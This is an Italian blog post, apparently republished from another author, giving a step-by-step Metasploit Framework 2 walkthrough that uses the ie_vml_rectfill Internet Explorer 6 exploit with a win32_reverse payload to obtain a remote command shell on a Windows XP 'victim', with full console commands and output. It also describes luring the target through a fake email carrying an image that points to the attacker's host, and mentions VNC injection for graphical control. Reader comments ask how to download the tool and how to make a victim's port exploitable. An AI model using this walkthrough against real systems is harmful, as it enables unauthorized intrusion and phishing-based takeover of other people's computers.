GUIDA Metasploit Framework..

http://carlitobrigante.files.wordpress.com/2008/02/resource.png

Per lavorare e provare il Metasploitframework , ho selezionato il Framework versione 2 , da: Penetration–>Metasploit Exploitation Framework–>Framework Version 2–>MSFconsole.




Per scegliere l’ exploit , ho eseguito il comando che mostra tutti gli exploit disponibili , show exploits.
http://carlitobrigante.files.wordpress.com/2008/01/msf-2.thumbnail.png

Quì ho scelto di usare l’ exploit:“ie_vml_rectfill” , questo , già dal codice , è un exploit che sfrutta una vulnerbilità insita in Internet Explorer alla versione 6 , e che permette all’ attaccante di eseguire del codice sul host della vittima.

un exploit , dopo la scelta , deve essere inserito e configurato , e viene fatta questa operazione tramite il comando use , e come configurazione visto che ogni exploit vuole una configurazione diversa , per farla ho digitato il comando show options , il quale mostra tutte le opzioni necessarie all’ uso dell’ exploit selezionato , e gli obbiettivi/target , a cui l’ exploit può far capo con successo.

il comando che ho dato quindi è:msf > use ie_vml_rectfill

dopodiché per vedere le opzioni di cui l’exploit necessita ho dato il comando show options:

msf ie_vml_rectfill > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
——– ——– ——- —————————-
optional HTTPHOST 0.0.0.0 The local HTTP listener host
required HTTPPORT 8080 The local HTTP listener port

Payload: Name Default Description
——– ——– ———– ——————————————
required EXITFUNC seh Exit technique: “process”, “thread”, “seh”
required LHOST XX.XXX.X.XX Local address to receive connection
required LPORT 4321 Local port to receive connection

Target: Windows NT 4.0 -> Windows 2003 SP1

msf ie_vml_rectfill(win32_reverse) >

*********************

Apro una piccola parentesi per dire che in ogni momento è possibile richiamare tramite alcuni comandi la lista disponibile di nops , encoders , exploits e di comandi disponibili tramite il comando help.

http://carlitobrigante.files.wordpress.com/2008/01/msf-7.thumbnail.pnghttp://carlitobrigante.files.wordpress.com/2008/01/msf-8.thumbnail.pnghttp://carlitobrigante.files.wordpress.com/2008/01/msf-7.thumbnail.png

(gli exploits sono stati riportati negli screenshots precedenti…)

***********

Per scegliere il payload diamo il seuente comando:

msf ie_vml_rectfill(win32_reverse) > show payloads

Metasploit Framework Usable Payloads
====================================

win32_downloadexec Windows Executable Download and Execute
win32_exec Windows Execute Command
win32_passivex Windows PassiveX ActiveX Injection Payload
win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload
win32_passivex_stg Windows Staged PassiveX Shell
win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject

Questi i payloads disponibili , e da questi non dobbiamo fare altro che selezionarne uno e vedere se necessita di configurazione , quindi con il comando seguente selezioniamo per il nostro attacco il payload: win32_exec , il quale ci consentirà l’esecuzione di comandi tramite il prompt Windows Xp , che è il sistema attaccato.

msf ie_vml_rectfill > set PAYLOAD win32_reverse

una volta eseguita la selezione del payload , come per l’ exploit vediamo le opzioni di cui necessita , diamo quindi il solito comando show option , ottenendo il risultato seguente:

msf ie_vml_rectfill(win32_reverse) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
——– ——– ——- —————————-
optional HTTPHOST 0.0.0.0 The local HTTP listener host
required HTTPPORT 8080 The local HTTP listener port

Payload: Name Default Description
——– ——– ———– ——————————————
required EXITFUNC seh Exit technique: “process”, “thread”, “seh”
required LHOST 29.230.6.74 Local address to receive connection
required LPORT 4321 Local port to receive connection

Target: Windows NT 4.0 -> Windows 2003 SP1

Le opzioni de default non vanno bene per il payload che abbiamo selezionato , visto , come ripeto , che è la vittima a connettersi al nostro fake server , allora devo dargli l’indirizzo su cui la vittima si connette e noi riceviamo la sua connessione e lo facciamo con il seguente comando:

msf ie_vml_rectfill(win32_reverse) > set HTTPHOST 29.XXX.6.XX

HTTPHOST -> 29.XXX.6.XX

Ora basta dare il comando exploit ,(colore-blue-prompt-vittima), e guardate voi il risultato ottenuto , (gli IP sono stati mascherti con delle “X”):

msf ie_vml_rectfill(win32_reverse) > exploit


[*] Starting Reverse Handler.
[*] Waiting for connections to http://29.XXX.X.XX:8080/
[*] Client connected from 1.42.XXX.XX:1042…
[*] Got connection from 29.XXX.6.XX:4321 <-> 1.42.XXX.XX:1043

Microsoft Windows XP [Versione 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\w33dsmok3r\Desktop>




http://carlitobrigante.files.wordpress.com/2008/01/metasploit_logos_icbm1.jpg

Ed ecco nelle nostre mani il totale controllo del sistema della vittima.

Microsoft Windows XP [Versione 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\w33dsmok3r\Desktop>exit

exit è stato il comando che io ho dato , perché stiamo facendo un test , ma pensate voi un malintenzionato cosa potrebbe arrivare a fare…

***

Ecco quindi a cosa serve il metasploitframework… …a rendersi immuni da attacchi di malintenzionati , la vittima del nostro attacco infatti , una volta che è venuto a conoscenza della falla di IE-6 , potrebbe benissimo pensare di passare a IE-7 , rendendosi così immune dall’ attacco con l’ exploit che abbiamo scelto in questo tutorial.

Il metasploitframework , è quindi un progetto grandioso , basta farne buon uso. I metodi di attacco a seconda della vittima e dell’ exploit sono molteplici , io al posto di usufruire del payload win32_reverse , avrei potuto ad esempio richiamare il payload win32_reverse_vncinject in questo caso avrei potuto anche ottenere il controllo grafico del sistema della vittima , tramite appunto l’ iniezione del payload di un VNC control , il programma per gestire da remoto un desktop , che però in questo caso sarebbe stato non autorizzato logicamente.

***

Non dobbiamo dimenticare una cosa però , che nel nostro caso è di fondamentale importanza , e cioé la connessione in un host “fake” del sistema vittma , praticamente c’é stata dopo l’ analisi dell’ attacco e la decisione di usare l’ exploit win32_reverse , la decisione di creare una fakemail , che conteneva l’ indirizzo IP dell’ host fake nascosto in un immagine che ha fatto in modo che la vittima si sia connessa al server fake , sul quale poi noi abbiamo ricevuto la connessione della vittima.

L’IP host fake , è stato inserito nella configurazione del exploit con il comando:

msf ie_vml_rectfill(win32_reverse) > set LHOST 29.XXX.6.XX

in questo modo abbiamo ricevuto la connessione , e ci siamo impadroniti del sistema vittima.
VIDEO_COME_ENTRARE_IN_PC_TRAMITE _I.E
fonte:carlitobrigante

15 Risposte to “GUIDA Metasploit Framework..”

  1. El_tractor Says:

    Ciao ago..come faccio a scaricare quel framework?

  2. ago1980 Says:

    che sisitema operativo usi…………

  3. El_tractor Says:

    windows xp

  4. El_tractor Says:

    ma per scaricarlo dove posso andare?

  5. scaricare cosa….

  6. ciao scusami ma che programma usi per creare il video??????

  7. ago scusa ma nn c’è una fregatura a scaricare quel video??? nella licenza ho letto che poi accetti a vedere video a sfondo sessuale… mi sbaglio io??? nn capisco bene l’inglese però… rispondi grazie

  8. giorgy83 Says:

    ciao mi kiamo giorgio ho preso lezioni da brigante in passato e gli ho detto ke ce un suo tutorial qui ma spero ke non te la prenda visto ke se hai copiato un suo lavoro sicuramente avrai già chiesto l autorizzazione.

    lo fatto solo perke non ho visto la fonte ma se hai kiesto il permesso trankul anzi sorry.

    ciao e buon lavoro🙂

  9. ago1980 Says:

    GRAZIE giorgy83 infatti nn trovavo piu’ il link dove avevo preso la guida, ho preso in considerazione questa guida perche’ e veramente ben spiegata….
    la guida e di brigante e il video e mio xd..

  10. Ciao bella guida:) non sono qui per farmi gli affari tuoi visto che il post è tuo😛 però ormai quella falla è piutosto vecchia e conosciuta io l’avrei fatta su un nuovo bug sai..🙂 per renderlò piu interessante aahah

  11. cesar_yasus Says:

    ciao
    io sto seguendo la guida metasploit framework e sono arrivato al punto …….Bene, finita la lista degli strumenti di cui disponiamo passiamo a fare la scansione delle porte sull host
    preso come nostro target-vittima:
    alla diciasettesima pagina ….ma pultroppo non ho un exploit adatto neanche in una delle porte aperte

    SERVICE
    open http
    open netbios-ssn
    open https
    open microsoft-ds

    come posso fare per aprire la
    135/tcp open msrpc Microsoft Windows RPC come nella guida?

  12. cesar_yasus Says:

    ok sono andato avanti e ho capito che per entrare si deve trovare almeno in una delle porte la vulnerabilita e questo e da quello che ho capito è abastanza improbabile,quindi se qualcuno mi vuole rispondere mi dica come si fa a far diventare almeno una porta della vittima vulnerabile in modo da poi potergli ecedere con un exploit

Lascia un commento

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione / Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione / Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione / Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione / Modifica )

Connessione a %s...

%d blogger cliccano Mi Piace per questo: